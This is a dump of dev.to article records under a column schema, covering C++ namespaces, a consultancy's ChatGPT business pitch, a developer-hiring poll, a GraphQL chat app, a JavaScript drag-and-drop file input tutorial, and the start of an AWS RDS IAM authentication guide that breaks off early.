| column | type | min | max |
| --- | --- | --- | --- |
| id | int64 | 5 | 1.93M |
| title | stringlengths | 0 | 128 |
| description | stringlengths | 0 | 25.5k |
| collection_id | int64 | 0 | 28.1k |
| published_timestamp | timestamp[s] | | |
| canonical_url | stringlengths | 14 | 581 |
| tag_list | stringlengths | 0 | 120 |
| body_markdown | stringlengths | 0 | 716k |
| user_username | stringlengths | 2 | 30 |
1,913,685
Using namespace std :)
A namespace in C++ is a way to organize code into logical groups and prevent name conflicts by...
0
2024-07-16T17:16:49
https://dev.to/madgan95/using-namespace-std--lo5
beginners, cpp, basic, c
A namespace in C++ is a way to organize code into logical groups and prevent name conflicts by creating a distinct scope for identifiers such as functions, classes, and variables. It helps in managing libraries and avoiding naming collisions in large projects.

---

# Let's understand this with an analogy:

## The Bookstore Analogy

**The Books:** Imagine a bookstore that contains books on various subjects. Each book has a unique identifier, a **category number**, to distinguish it from other books.

In this analogy: **Books** are like the functions, classes, and variables in C++. Category numbers are like namespaces.

**Sections:** The bookstore is divided into different sections, each containing books on specific topics. For example:

- **Mathematics Section**
- **Literature Section**
- **Stories Section**

---

# Now let us fit in the example:

## The std Namespace as a Section

Think of the std namespace as the Standard section in that bookstore. It has books such as:

- **iostream** for input and output
- **vector** for dynamic arrays
- **string** for text strings

## To use a book from the std Section:

```
#include <iostream>

int main() {
    std::cout << "Hello, World!" << std::endl;
    return 0;
}
```

The above code is similar to saying, **"I want to read the books cout and endl from the std section of the bookstore."**

## Books from only the std section:

If you find it tedious to specify the section name every time you borrow a book from the std section, you can say: **"I will mostly borrow books from the std section."**

```
#include <iostream>

using namespace std;

int main() {
    cout << "Hello, World!" << endl;
    return 0;
}
```

---

# Other Sections/Namespaces in C++:

## Boost Namespace:

The Boost section contains advanced books that extend the functionality of the standard library. Books: smart pointers, regular expressions, threads, etc.

```
#include <boost/shared_ptr.hpp>
#include <iostream>

int main() {
    boost::shared_ptr<int> ptr(new int(10));
    std::cout << "Value: " << *ptr << std::endl;
    return 0;
}
```

## Custom Namespace:

```
#include <iostream>

namespace Drawing {
    void drawCircle() {
        std::cout << "Drawing a circle" << std::endl;
    }
}

int main() {
    Drawing::drawCircle();
    return 0;
}
```

# Knowhow

**Libraries:** `<vector>`, `<iostream>`, `<string>`, etc.
**Namespaces:** std, boost, etc.
**Functions:** cout, cin, etc.

---
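To see the collision-prevention claim in action, here is a small extra sketch; the `Math` and `Physics` namespaces are invented for illustration. Two "sections" can each hold a "book" with the same name, and the namespace prefix tells the compiler which one you mean:

```
#include <iostream>

// Two hypothetical "sections", each with a book named calculate().
namespace Math {
    int calculate() { return 1; }
}

namespace Physics {
    int calculate() { return 2; }
}

int main() {
    // The prefix selects the "section", so identical names never collide.
    std::cout << Math::calculate() << " " << Physics::calculate() << std::endl;
    return 0;
}
```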
madgan95
1,914,025
Implementing ChatGPT for Business Efficiency
Unlock the potential of your business with ChatGPT. Discover how to implement Generative AI to enhance productivity, automate routine tasks, and elevate customer interactions. Learn the strategic steps for seamless AI integration and leverage Dev3loper.ai’s consulting, development, and training services to drive innovation and achieve your business goals. Embrace the future of efficiency and growth with expert guidance and powerful AI solutions.
0
2024-07-15T05:07:46
https://dev.to/dev3l/implementing-chatgpt-for-business-efficiency-3234
generativeai, ai, productivity, transformation
--- title: Implementing ChatGPT for Business Efficiency published: true description: Unlock the potential of your business with ChatGPT. Discover how to implement Generative AI to enhance productivity, automate routine tasks, and elevate customer interactions. Learn the strategic steps for seamless AI integration and leverage Dev3loper.ai’s consulting, development, and training services to drive innovation and achieve your business goals. Embrace the future of efficiency and growth with expert guidance and powerful AI solutions. tags: GenerativeAI, AI, Productivity, Transformation cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gd30mlbcf6mi96sih9mg.png --- [Originally posted on Dev3loper.ai](https://www.dev3loper.ai/insights/implementing-chatgpt-for-business-efficiency) In the modern business landscape, innovation is the key to staying ahead. Generative AI capabilities rapidly transform companies' operations, creating unprecedented efficiency and productivity opportunities. ChatGPT, developed by OpenAI, stands at the forefront of this revolution, offering businesses a powerful tool to amplify human potential and streamline operations. Imagine a world where routine tasks are automated, personalized customer interactions are handled seamlessly, and insightful content is generated effortlessly—all with the aid of AI. While these technologies are not yet at a point where they can wholly replace human efforts, they serve as indispensable tools that multiply the productivity and impact of individuals and organizations. Dev3loper.ai is dedicated to helping businesses harness the transformative power of Generative AI. Our comprehensive range of consulting services is designed to accelerate technological innovation and adoption, empowering your organization to achieve its strategic goals. Join us as we explore how ChatGPT can be seamlessly integrated into your business processes, driving efficiency, optimizing operations, and enabling your team to focus on what they do best. Welcome to the AI-driven future of business. Welcome to Dev3loper.ai. ## Understanding the Potential of ChatGPT ![Understanding the Potential of ChatGPT](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6wh9ji0p8wr5juzxbbn7.png) Generative AI, specifically ChatGPT, is revolutionizing businesses' operations by automating routine tasks and enhancing human capabilities. ChatGPT is a sophisticated language model developed by OpenAI that can understand and generate human-like text. Here's a deeper look into its core functionalities and potential applications: ### What is ChatGPT? ChatGPT is an advanced AI model designed to generate and understand natural language. It can comprehend context, engage in productive conversations, and produce coherent and relevant text across various domains. ChatGPT's versatility can be applied in many business scenarios where effective communication and data processing are crucial. ### The Transformative Potential of ChatGPT When integrated into business operations, ChatGPT can: - **Boost Efficiency:** Automate repetitive tasks, freeing up human resources for more strategic activities. - **Enhance Productivity:** Provide instant responses and support, enabling teams to operate more effectively. - **Improve Customer Relations:** Personalize interactions and offer round-the-clock assistance, increasing customer satisfaction. - **Generate Valuable Content:** Create high-quality content quickly, supporting marketing and communication efforts. 
By leveraging ChatGPT, businesses can transform from human-driven, machine-assisted operations to AI-driven, human-assisted models. This paradigm shift optimizes resource allocation and opens up new avenues for innovation and growth. At Dev3loper.ai, we specialize in helping businesses realize the full potential of Generative AI. Our tailored strategies and support systems ensure that your integration of ChatGPT is seamless, effective, and aligned with your unique business goals. ## Major Applications of Generative AI in Business ![Major Applications of Generative AI in Business](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/575nj1ej25jo2uasaq4c.png) Generative AI, like ChatGPT, has diverse applications that can revolutionize various business functions. Here, we'll delve into the primary areas this technology can significantly impact. ### Lead Generation and Qualification **Information Processing:** ChatGPT can process vast amounts of information about potential leads from multiple sources, allowing sales teams to focus on high-potential prospects. Businesses can ensure they are pursuing the most promising leads by automating the research process. **Web Scraping:** Generative AI can gather valuable insights from websites, social media, and other knowledge bases, identifying leads that fit specified criteria and helping create a comprehensive database of potential customers. **Profile Creation and Matching:** AI can generate detailed profiles for each lead, matching them with your ideal customer criteria. This ensures the sales team's efforts are directed toward the most relevant prospects. **Customized Email Drafting and Content Suggestions:** ChatGPT can craft personalized outreach emails and content for each lead, tailoring messaging to increase engagement. This personalization often leads to higher conversion rates and stronger customer relationships. ### Content Creation **Automated Drafting:** AI can automate drafting blog posts, marketing materials, reports, and other written content. This ensures a steady flow of high-quality content without straining resources. **Personalized Newsletters and Ad Campaigns:** Generative AI can produce highly targeted newsletters and ad campaigns tailored to specific audience segments. This customization enhances the relevancy and effectiveness of marketing efforts. **Creative Assistance:** ChatGPT can assist in creating scripts for videos or podcasts, designing mock-ups for marketing materials, and generating engaging company stories that resonate with your audience. ### Customer Support **AI-Powered Chatbots:** AI chatbots can handle first-line support 24/7, quickly responding to common inquiries. This reduces the workload on human support teams and ensures customers receive timely assistance. **Sentiment Analysis:** ChatGPT can analyze customer feedback from various channels to gauge sentiment and identify emerging trends. This proactive approach helps address issues before they escalate, improving customer satisfaction. **Help Center Content Generation:** AI can create FAQs, how-to guides, and troubleshooting manuals, which are invaluable for customers and support agents. This comprehensive support content enhances self-service capabilities. ### Process Automation **Document Generation:** AI can automate the creation of standard documents such as contracts, invoices, and reports. This ensures accuracy and consistency while freeing up time for more strategic tasks. 
**Routine Communication Automation:** ChatGPT can generate and schedule routine communications, such as appointment reminders, payment follow-ups, and renewal notices. This automation enhances efficiency and ensures timely interactions with customers and clients. **Workflow Optimization:** AI can suggest improvements to process workflows based on detected inefficiencies. This can lead to more streamlined operations and better resource utilization. ### Sales and Marketing **Campaign Personalization:** Generative AI can create highly targeted advertising copy and materials for specific customer segments or individuals, enhancing campaign effectiveness and ROI. **Meeting Summaries:** ChatGPT can draft summaries of sales calls and meetings, highlighting key points, action items, and follow-ups. This ensures clear communication and accountability within the team. **Market Research:** AI can generate summaries of market trends, competitive analysis reports, and industry updates. These insights empower sales and marketing teams to make data-driven decisions. ### Human Resources **Recruitment Messaging:** AI can compose personalized recruitment messages, job postings, and follow-up emails, making the recruitment process more efficient and engaging for candidates. **Policy and Training Material Creation:** ChatGPT can draft HR policies, training manuals, and onboarding materials, ensuring comprehensive and up-to-date documentation. **Employee Engagement Analysis:** AI can analyze survey results to provide insights into employee satisfaction and suggest actionable improvements to foster a positive workplace culture. ## Steps to Implement ChatGPT in Your Business ![Steps to Implement ChatGPT in Your Business](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b3wu4515j0pqpptmap2r.png) Implementing ChatGPT in your business involves a strategic approach to ensure that the AI integration aligns seamlessly with your organizational goals. Follow these steps to maximize the benefits of this powerful technology: ### Step 1: Identify Needs and Use Cases **Analyze Areas for AI Integration:** Begin by analyzing which parts of your operations can most benefit from automation and AI assistance. Common areas include customer service, marketing, sales, and internal documentation. Identifying specific pain points where ChatGPT can provide significant value is crucial. **Outline Common Applicable Business Areas:** Determine the broader business functions—lead generation, content creation, customer support, process automation, sales, marketing, and human resources—that Generative AI can enhance. This holistic understanding will guide the AI implementation strategy. ### Step 2: Engage with AI Consulting Services Dev3loper.ai's AI Consulting Services provide the expertise needed to navigate the complexities of AI implementation and ensure transformative results. **Personalized AI Consulting:** - **Assessment:** Evaluate your current systems, processes, and data readiness to establish a baseline. - **Strategic Planning:** Develop a roadmap for AI adoption aligned with your business goals. - **Model Development:** Design and train AI models tailored to your specific use cases. - **Implementation:** Seamlessly integrate AI solutions into your infrastructure with minimal disruption. - **Evaluation and Optimization:** Continuously monitor and refine AI models to ensure optimal performance. 
**Proof of Concept & Production Release:** - **Concept Validation:** Test and validate AI concepts on a small scale to ensure feasibility and effectiveness. - **Data Preparation:** Prepare and preprocess data accurately to train models. - **Model Training:** Utilize best practices and the latest techniques for optimum performance. - **Deployment:** Implement models in a production environment with robust monitoring and management. - **Operationalization:** Establish MLOps practices to manage, monitor, and maintain AI systems in production. **Custom GPTs and OpenAI Assistants Development:** - **Requirement Analysis:** Understand the specific needs for AI assistants and NLP. - **Model Customization:** Develop and fine-tune GPT models tailored to business needs. - **Integration:** Integrate AI assistants into existing systems like customer service platforms or CRMs. - **Training and Refinement:** Continuously improve AI assistants based on interaction data. - **User Experience Optimization:** Ensure AI interactions are engaging, relevant, and valuable. ### Step 3: Develop and Integrate **Custom Full-Stack Software Development:** Dev3loper.ai's software development services ensure that AI solutions integrate seamlessly with your existing workflows. - **Requirement Analysis:** Collaborate with stakeholders to understand business needs and project requirements. - **Architectural Design:** Develop a flexible architectural plan that ensures scalability and security. - **Development and Implementation:** Build robust applications using Agile and XP practices, such as continuous integration, pair programming, and test-driven development. - **Rapid Deployment:** Deliver functional software quickly for early feedback. - **Continuous Refinement:** Iterate based on user feedback to enhance performance. - **Testing and Quality Assurance:** Maintain functionality and security through ongoing testing. - **Maintenance and Support:** Ensure systems evolve to meet changing business needs. ### Step 4: Train and Coach Team Members **Technical and Developmental Coaching:** Dev3loper.ai provides coaching to elevate your team's skills in utilizing AI tools and implementing best practices. - **Skills Assessment:** Evaluate current skill levels and identify areas for improvement. - **Customized Training Plans:** Develop personalized coaching plans based on identified needs. - **Hands-On Workshops:** Conduct practical workshops on AI tools and practices like TDD. - **Iterative Feedback and Improvement:** Provide continuous feedback and training sessions to reinforce learning. - **Follow-Up Support:** Offer ongoing support to address challenges and reinforce skills. **Custom-Tailored Courses:** - **Needs Analysis:** Identify specific training needs and objectives. - **Course Design:** Develop bespoke courses tailored to your goals. - **Interactive Learning:** Use interactive teaching methods, including live coding sessions and real-world case studies. - **Continuous Assessment:** Implement assessments to measure progress and adjust content as needed. - **Resource Provision:** Provide additional materials for ongoing education and skill development. ### Step 5: Continuous Improvement and Adaptation **Ongoing AI Performance Evaluation:** Regularly assess the performance of AI systems to ensure they meet the evolving needs of the business and provide continuous value. 
**Collaborative AI Application Development:** - **Capability Building:** Enhance your organization's internal AI competencies through collaborative development and training. - **Methodological Innovation:** Introduce and implement AI methodologies that improve efficiency and effectiveness. - **Support and Maintenance:** Provide continuous support to adapt AI systems to new challenges and opportunities. **Leveraging Artium's APEX Framework:** Utilize Artium's APEX framework to develop a concrete product plan and a business proposal, laying a solid foundation for successful AI integration. This framework helps articulate ideas clearly and aligns AI strategies with business objectives. ## Leveraging Dev3loper.ai’s Specialty Services ![Leveraging Dev3loper.ai’s Specialty Services](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r2qxe64poe7v5hfw5lbm.png) Dev3loper.ai offers a suite of specialty services designed to address specific needs within your organization. These services ensure that your AI integration is comprehensive and practical, providing the extra support required to optimize your AI capabilities and drive business success. ### Technical Ghost Writing **Bespoke AI Content Creation:** Dev3loper.ai provides high-quality content tailored to your needs, ensuring your AI initiatives are clearly and effectively communicated to your target audience. This includes creating white papers, technical documents, and marketing materials. **Our Ghostwriting Process:** - **Requirement Gathering:** Collaborate with stakeholders to understand content needs and objectives. - **Research and Analysis:** Conduct thorough research to ensure content accuracy and relevance. - **Content Creation:** Develop high-quality, impactful content tailored to your audience. - **Review and Revision:** Work with stakeholders to review and refine content, ensuring it meets expectations. - **Final Delivery and Support:** Provide the finalized content and offer support for any additional modifications or improvements. ### Comprehensive Strategy and Planning Dev3loper.ai helps define and execute strategic plans that align with your business goals. Our holistic approach ensures that every aspect of your AI initiative is well thought out and contributes to overall success. **Our Strategic Planning Framework:** - **Business Case Development:** Collaborate with stakeholders to develop robust business cases for AI and software investments. - **Product Vision Exploration:** Define a clear product vision that aligns with your strategic goals. - **Backlog Creation:** Develop and prioritize a product backlog, ensuring development tasks are aligned with business objectives. - **Core User Identification:** Identify and analyze core user demographics to tailor product features and functionality. - **Implementation Roadmap:** Create a detailed roadmap guiding the execution of strategic plans. - **Continuous Evaluation:** Regularly review and adjust strategies based on feedback and changing market conditions, ensuring sustained alignment with business goals. ### Organizational AI Capability Building Dev3loper.ai supports collaborative development of AI applications, model training, and methodological innovation, helping build your organization's internal AI competencies. **Our Capability-Building Approach:** - **Assessment and Planning:** Evaluate current AI capabilities and identify areas for growth. - **Training Programs:** Develop and deliver training programs tailored to your organization's needs. 
- **Collaborative Development:** Work with your team to develop AI applications and train models, ensuring knowledge transfer and skill-building. - **Methodological Innovation:** Introduce and implement AI methodologies that enhance your organization's capabilities. - **Ongoing Support:** Provide continuous support to ensure the sustained growth of your AI competencies. --- By leveraging Dev3loper.ai's specialty services, businesses can ensure their AI integration is successful and optimized for long-term growth and efficiency. With comprehensive strategy and planning, bespoke content creation, and robust capability building, your organization can thrive in an AI-driven future. ## Conclusion ![Conclusion](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6ow76cjsvvmfrl0n9nrt.png) Integrating ChatGPT and other Generative AI technologies into business operations represents a transformative leap into the future of efficiency and innovation. By automating routine tasks, generating personalized content, and enhancing customer interactions, ChatGPT empowers businesses to achieve new levels of productivity and operational excellence. Throughout this article, we've explored ChatGPT's vast potential, from lead generation and content creation to customer support and process automation. These applications highlight how AI can augment human capabilities, ensuring that your team can focus on strategic, high-impact activities rather than being bogged down by repetitive tasks. However, the successful adoption of AI requires a strategic approach. This is where Dev3loper.ai comes in. Our comprehensive range of consulting services, including personalized AI integration strategies, custom software development, and in-depth training and coaching, ensures that your organization can seamlessly embrace AI. With Dev3loper.ai's expertise, businesses like TechWave Solutions have harnessed the power of ChatGPT to drive significant growth and efficiency. The possibilities are endless, from generating detailed lead profiles to automating content creation and transforming customer support. At Dev3loper.ai, we believe in a future where AI is a powerful ally to human ingenuity. We aim to help you navigate the complexities of AI implementation, transforming theoretical potential into practical, impactful solutions. Now is the time to leverage AI's transformative power and stay ahead in the competitive business landscape. Contact Dev3loper.ai today to explore how our tailored AI consulting and development services can help your organization achieve its strategic goals and drive innovation. Together, we can shape a future where the synergy between human creativity and AI technology unlocks unprecedented possibilities for success and growth.
dev3l
1,914,224
Given tech layoffs, how long is it taking to hire devs?
Recently I became curious as to how the job market is for companies hiring developers. I wanted to...
0
2024-07-07T03:41:39
https://dev.to/brookzerker/give-tech-layoffs-how-long-is-it-taking-to-hire-devs-37n6
Recently I became curious as to how the job market is for companies hiring developers. I wanted to look into this as I truly believe that it is more cost effective to train devs instead of hiring new ones. But I wanted to gather some data instead of just relying on my feelings (and of course I'm biased too). My initial thought was the opposite of what I wanted to find, though: that companies would be able to hire new developers quickly (within 3 months of starting the search) due to all the layoffs in the dev world that have been happening recently. So I set up some polls asking my followers on LinkedIn, YouTube, and X how long it was taking their companies to hire a dev. I gave three options plus a fun opt-out option for anyone who wanted to answer the poll but not give a real answer. The options were:

- < 3 months
- 3 - 6 months
- > 6 months
- companies are hiring?

I left the poll running for a week and we now have the results.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qj6nu00e2k5ijm9vbnec.png)

I got 117 responders to the poll, but 81 of them chose the `companies are hiring?` option, leaving 35 people across the other results. Of these 35 people, 20 reported that it was taking more than six months to hire a new dev, 10 were able to hire in less than 3 months, and 5 were in the middle.

I understand that this is a small sample size, and I didn't control for size, type, and/or region of the companies. I would love for someone with a larger audience to run the same poll and see if the numbers correlate. That being said, the response is the opposite of what I originally thought: it's taking many companies more than 3 months to hire new devs. And we also know that hiring is only the first step. Once hired, devs are going to need to be onboarded into the company and the projects. This could take a long time as well.

Even with this smaller amount of data, I'm more confident in my claim that a company that trains its developers, instead of laying them off to hire new developers with a different skillset, is going to be cheaper in both the short and long run.
brookzerker
1,914,406
Build an Instagram message chat app
Hello, everyone! I have just built a web version of a chat application, similar to the cover image...
0
2024-07-14T08:44:54
https://dev.to/zwd321081/build-a-instagram-message-chat-app-ibn
javascript, graphql, react, mongodb
Hello, everyone! I have just built a web version of a chat application, similar to the cover image above.

You can watch a brief introduction video on [YouTube](https://youtu.be/S7Zanjrw8v4?si=O_JoZFdD8aPkmBms).

The project consists of both a client side and a server side. The client side uses [create-vite-app](https://vitejs.dev/guide/) with `Reactjs` + `Typescript`. On the server side, we use `GraphQL`, `Apollo`, `MongoDB`, and `Mongoose`.

The design file can be accessed [here](https://www.figma.com/design/AVkjKyXt9UpJPdxJt6EoV5/10-Real-Chat%2FMessaging-Pages---Facebook%2C-Reddit%2C-Snapchat-%26-more-(Community)?node-id=0-1&t=gx4KTbUaNaN409XH-0)

## Why use GraphQL?

It's incredibly easy to use right out of the box when starting up, and it can readily scale to meet large-scale demands when needed.

1. GraphQL is based on HTTP POST and has only one endpoint; all your requests, like CRUD operations, are sent via this single endpoint.
2. GraphQL is really convenient when nesting queries.
3. The Apollo framework provides built-in functionalities such as server management, API testing, and WebSocket subscriptions for message handling.

The source code is on [GitHub](https://github.com/zwd321081/instgram-messages/tree/master).
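As a hedged illustration of point 2 above, a single nested query could fetch a conversation, its recent messages, and each sender in one round trip. The fields shown here (`conversation`, `messages`, `sender`, and the `last` argument) are a hypothetical schema for illustration, not taken from the actual repo:

```
# One request returns the conversation with messages and senders already nested.
query GetConversation($id: ID!) {
  conversation(id: $id) {
    id
    participants {
      username
      avatarUrl
    }
    messages(last: 20) {
      text
      createdAt
      sender {
        username
      }
    }
  }
}
```

With a REST API, the same view would typically need separate requests for the conversation, its messages, and each sender's profile.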
zwd321081
1,914,903
Implementing Drag-Drop for File Input on the Web.
Drag-drop is one of the most engaging ways of transferring files between windows on a computer. All...
0
2024-07-16T12:17:54
https://dev.to/ghostaram/implementing-drag-drop-for-file-input-on-the-web-6c
Drag-drop is one of the most engaging ways of transferring files between windows on a computer. All modern file explorers come with this functionality. Browsers also happen to have a default behavior for drag-drop. By default, the browser will try to open a file dropped into it unless it is programmed to do something else. In this article, we will learn how to program the browser to treat a drag-drop as a file input operation. We will also extend the program to allow us to open the file input dialog and select a file by clicking the drag-drop target.

Implementing actions during drag-drop can be done using the `DragEvent` interface provided in the browser by JavaScript. The `DragEvent` interface provides several events from when a drag begins to when it ends. In this article, we will leverage the power of the `DragEvent` interface to create a drag-drop file input user interface.

We will implement the proposed user interface in the following order:

1. Create the HTML Markup
2. Style the Markup
3. Make it interactive
4. Style the interaction
5. Make it clickable

Let's begin ...

## 1. Create the HTML Markup

Before going any further into the article, let us create a simple HTML markup.

```
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Drag and Drop File Upload</title>
    <link rel="stylesheet" href="./style.css">
</head>
<body>
    <div id="drop-zone" class="drop-zone">
        <p>Drag & drop files here or click to upload</p>
    </div>
    <script src="./drag-drop.js"></script>
</body>
</html>
```

## 2. Style the Markup

The following stylesheet provides a few basic styles for the page.

```
/* style.css */
body {
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
    background-color: #f0f0f0;
}

.drop-zone {
    width: 300px;
    height: 200px;
    border: 2px dashed #007bff;
    border-radius: 4px;
    display: flex;
    justify-content: center;
    align-items: center;
    text-align: center;
    color: #007bff;
    cursor: pointer;
    transition: background-color 0.2s ease;
}
```

The above markup and style create a container with a blue dotted border and prompt text. The screenshot below shows what we have just created when opened in the browser.

![The Drop zone container](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0av6o8d8nhgu1lo0rlik.png)

## 3. Make it interactive

Dragging and dropping files into the dotted container or clicking it to input files won't work just yet. We need JavaScript for that part. In the script, we will add various event listeners to elements in the document. The first event we will listen for is the `DOMContentLoaded` event on the `document`.

```
document.addEventListener('DOMContentLoaded', () => {

})
```

You might be wondering what the `DOMContentLoaded` event is and how it is different from the `load` event. Even more, why did we choose to use it over the `load` event?

The `DOMContentLoaded` event is fired as soon as the `DOM` tree has been created. This event does not wait for other resources such as styles, images, data, and other external resources to be loaded. The `DOMContentLoaded` event is fired as soon as the elements of the page have been inserted into the DOM tree.

On the other hand, the `load` event waits a little longer before it is fired. The `load` event is fired after all the resources of a page, including styles, images, fetched data, and all other external resources, have been loaded into the browser.
Our interest in this project has nothing to do with external resources but everything to do with a few DOM elements. This is why we choose the `DOMContentLoaded` event over the `load` event. The `load` event could work just as well, but we do not need to wait that long. We want to attach the event listeners to the target elements as soon as they are added to the `DOM`.

We will perform all subsequent operations and listen for all the other required events within the `DOMContentLoaded` event handler.

### The drop zone container

We want to make the drop zone container aware of the drag-drop interaction. Here, we will tell the browser what to do when a file is dropped within the borders of the drop-zone container. First, we need to get the drop zone container element from the `DOM` as done below.

```
document.addEventListener('DOMContentLoaded', () => {
    const dropZone = document.querySelector('#drop-zone')
})
```

Next, we attach the `drop` event to the drop zone container and provide an event handler.

```
dropZone.addEventListener('drop', (event) => {

})
```

In the event handler, we will program the browser to treat the drag-and-drop interaction as a file input. This means that if a file is dragged and dropped within the borders of the drop zone container, the browser will override its default behavior with the program in the event handler function. You can do anything with the dropped file. In our case, we will simply log the file information in the browser's console. Below is the implementation:

```
dropZone.addEventListener('dragover', (event) => {
    event.preventDefault()
})

dropZone.addEventListener('drop', (event) => {
    event.preventDefault()
    const files = event.dataTransfer.files
    console.log(files)
})
```

The code snippet above adds two event listeners to the drop zone container, for the `dragover` and the `drop` events. Technically, we only care about dropping the file within the borders of the container. So why bother with the `dragover` event? We take care of the `dragover` event because we drag the file over the drop zone container before we can drop it, and the browser has a default behavior for the `dragover` event. The least we can do about the default behavior of the browser is to prevent it. We access the files list from `event.dataTransfer` and log it on the browser console.

Everything works well, but the look, not very much so. In the next section, we will add styles to the process.

## 4. Style the interaction

What if you wanted to do more than prevent the default behavior of the browser? What if you intend to change the background color of the drop zone container throughout the process? Say one color when dragging over the drop zone container, a different color when you drag past the borders of the target container, and another color when you drop the file in the intended container. Well, that can easily be done as shown below.

```
dropZone.addEventListener('dragover', (event) => {
    event.preventDefault()
    dropZone.style.backgroundColor = '#e0e0e0'
})

dropZone.addEventListener('dragleave', () => {
    dropZone.style.backgroundColor = '#eb6363a6'
})

dropZone.addEventListener('drop', (event) => {
    event.preventDefault()
    dropZone.style.backgroundColor = '#f0f0f0'
    const files = event.dataTransfer.files
    console.log(files)
})
```

The adjustments above involve altering the background color of the drop zone container from the initial background color to a gray color when the file is dragged into the drop zone container.
The color changes to a shade of red if the drag leaves the container without dropping the file. Dropping the file resets the color to the initial background color. That's all good, but didn't we say we could also click it? Up next ...

## 5. Make it clickable

The prompt in the container says we can also click the box to input a file. Unfortunately, clicking the box now doesn't open the file explorer as promised. How can we fix that? You guessed it right: add a click event listener to the container.

```
dropZone.addEventListener('click', () => {

})
```

We have added the `click` event listener, now what? In standard user interfaces, we trigger the opening of the file explorer by clicking a file input element that is displayed on a web page. In our case, we don't want to display a file input element. Lucky for us, we can add the element to the `DOM` and hide it from display using the `hidden` attribute. We can also click it programmatically using JavaScript. Extend the initial HTML markup to include the `input` element as shown below:

```
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Drag and Drop File Upload</title>
    <link rel="stylesheet" href="./style.css">
</head>
<body>
    <div id="drop-zone" class="drop-zone">
        <p>Drag & drop files here or click to upload</p>
        <input type="file" id="file-input" multiple hidden>
    </div>
    <script src="./drag-drop.js"></script>
</body>
</html>
```

The `hidden` attribute allows us to exclude the input element from the display while keeping it in the `DOM` tree. Now that we have the input element in the `DOM`, we can access it from our JS scripts and click it programmatically when the drop zone container is clicked. The code snippet below implements the program.

```
dropZone.addEventListener('click', () => {
    const fileInputElement = document.querySelector('#file-input')
    fileInputElement.click()
})
```

## Summary

That is how we create a clickable drag-drop file input user interface. The drag-drop file input user interface uses the `DragEvent` interface, which provides the `dragover`, `dragleave`, `drop`, and other browser events. When implementing the drag-drop file input, it is important to alter the styles of the drop target to improve the user experience. In addition to the drag-drop input, users will always appreciate the additional option of clicking the drop zone to open the file explorer. You can add a hidden file input element to your markup and click it programmatically when the drop zone is clicked.

That's all for the article, thanks for reading. Feel free to say something in the comments section. Bye bye.

Read more about [the `DragEvent` interface on MDN](https://developer.mozilla.org/en-US/docs/Web/API/DragEvent).
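One gap worth noting: clicking now opens the file dialog, but nothing yet reads the files the user picks there. A minimal sketch of how that could be wired up, assuming the same `#file-input` element and reusing the console-logging behavior from the drop handler:

```
// Hypothetical addition: listen for the input's change event so files
// chosen through the dialog are handled like dropped files.
const fileInputElement = document.querySelector('#file-input')

fileInputElement.addEventListener('change', () => {
    // files is a FileList, just like event.dataTransfer.files in the drop handler
    const files = fileInputElement.files
    console.log(files)
})
```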
ghostaram
1,915,099
AWS: RDS IAM database authentication, EKS Pod Identities, and Terraform
We’re preparing to migrate our Backend API database from DynamoDB to AWS RDS with PostgreSQL, and...
0
2024-07-13T09:42:19
https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/
kubernetes, devops, security, aws
---
title: AWS: RDS IAM database authentication, EKS Pod Identities, and Terraform
published: true
date: 2024-07-07 22:57:29 UTC
tags: kubernetes,devops,security,aws
canonical_url: https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/
---

![](https://cdn-images-1.medium.com/max/1024/1*JZAYCCIy6Muaxtz2FKpu0w.png)

We're preparing to migrate our Backend API database from DynamoDB to AWS RDS with PostgreSQL, and finally decided to try out [AWS RDS IAM database authentication](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html), which appeared in 2021.

IAM database authentication, as the name implies, allows us to authenticate to RDS using AWS IAM instead of a login and password from the database server itself. However, authorization, that is, checking what access the user has to the database(s), remains with the database server itself, because IAM will only give us access to the RDS instance itself.

So what are we going to do today?

- first, we'll try out how RDS IAM database authentication works in general, and how it is configured
- then we'll move on to automation with Terraform, and recall how [AWS EKS Pod Identities](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/) works
- we will write Python code that will run in a Kubernetes Pod with a ServiceAccount attached and will connect to an RDS instance using RDS IAM database authentication
- and finally, we'll discuss the challenges of using RDS IAM database authentication and automation with Terraform

I'm testing on an RDS instance that was created for Grafana, so sometimes there will be names with "_monitoring_"/"_grafana_".

### How does RDS IAM database authentication work?

Documentation: [IAM database authentication for MariaDB, MySQL, and PostgreSQL](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html).

The general idea is that instead of using a common password for RDS, an IAM token is used for an IAM Role or IAM User which has an IAM Policy connected, and that IAM Policy describes a username and an ID of an Aurora cluster or RDS instance. But, unfortunately, this is where the role of IAM ends, because accesses and permissions in the database server itself are created and managed as before, that is, through CREATE USER and GRANT PERMISSIONS.

### IAM database authentication and Kubernetes ServiceAccount

As for Kubernetes Pods, I honestly expected a little more, because I thought that just by using an IAM Role and a Kubernetes ServiceAccount, it would be possible to connect to RDS without a password at all, as we do with access to other resources in AWS through the AWS API. But with RDS, the scheme looks a bit different:

- we create an RDS instance with the IAM authentication parameter == true
- then create an IAM Role with an IAM Policy
- create a corresponding user in PostgreSQL/MariaDB, and enable authentication via IAM
- in Kubernetes, create a ServiceAccount with this role
- connect this ServiceAccount to the Kubernetes Pod
- in the Pod, using the IAM Role from that ServiceAccount, we'll have to generate an IAM RDS Token for RDS access
- and with that token, we can connect to the RDS server

Let's try it manually first, and then we'll see how to do it with Terraform, because there are some nuances.
### RDS IAM authentication: testing

